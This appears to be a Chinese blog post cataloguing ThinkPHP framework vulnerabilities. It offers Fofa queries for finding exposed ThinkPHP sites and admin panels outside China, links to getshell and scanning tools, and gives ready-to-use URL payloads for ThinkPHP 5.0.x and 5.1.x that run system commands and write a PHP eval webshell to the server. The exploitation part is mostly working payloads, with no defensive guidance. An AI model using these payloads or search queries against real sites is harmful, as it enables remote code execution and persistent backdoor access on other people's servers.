php开发框架Thinkphp系列漏洞
AI-摘要
Tianli GPT
AI初始化中...
介绍自己 🙈
生成本文简介 👋
推荐相关文章 📖
前往主页 🏠
前往爱发电购买
php开发框架Thinkphp系列漏洞
hihopkcThinkphp简介
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。
很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。
Thinkphp历史漏洞
版本 | 漏洞类型 |
---|---|
ThinkPHP3.2.3 | 缓存函数设计缺陷可导致Getshell |
ThinkPHP3.2.3 | 最新版update注入漏洞 |
ThinkPHP3.2.X | find_select_delete注入 |
ThinkPHP3.X | order_by注入漏洞 |
ThinkPHP5.0.X | sql注入漏洞 |
ThinkPHP5.0.10 | 缓存函数设计缺陷可导致Getshell |
ThinkPHP5 | SQL注入漏洞&&敏感信息泄露 |
ThinkPHP5.X | order_by注入漏洞 |
ThinkPHP5.X | 远程代码执行 |
Thinkphp历史漏洞发现
- 默认页面、错误页面
批量漏洞检测
Fofa
1
2
3header="thinkphp" && country!="CN"
header="thinkphp" && country!="CN" && title="后台管理"
header="thinkphp" && country!="CN" && title="后台管理" && after="2021-01-01"
Thinkphp历史漏洞利用
https://github.com/Lucifer1993/TPscan
https://github.com/theLSA/tp5-getshell
https://github.com/Lotus6/ThinkphpGUI
https://github.com/bewhale/thinkphp_gui_tools
https://github.com/MrHatSec/ThinkPhp5.x_Scan
Thinkphp3 漏洞总结 :
https://y4er.com/post/thinkphp3-vuln/
Thinkphp5 RCE 总结 :
https://y4er.com/post/thinkphp5-rce/
5.0.* 版本常用POC
- 执行命令
1 | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami |
- 写入Webshell
1 | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[ccc]);?> |
5.1.* 版本常用POC
- 执行命令
1 | /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
- 写入Webshell
1 | /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[ccc]);?>" >shell.php |
其他payload:
1 | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami |
5.0.23漏洞利用POC
1 | POST:/index.php?s=captcha |
评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果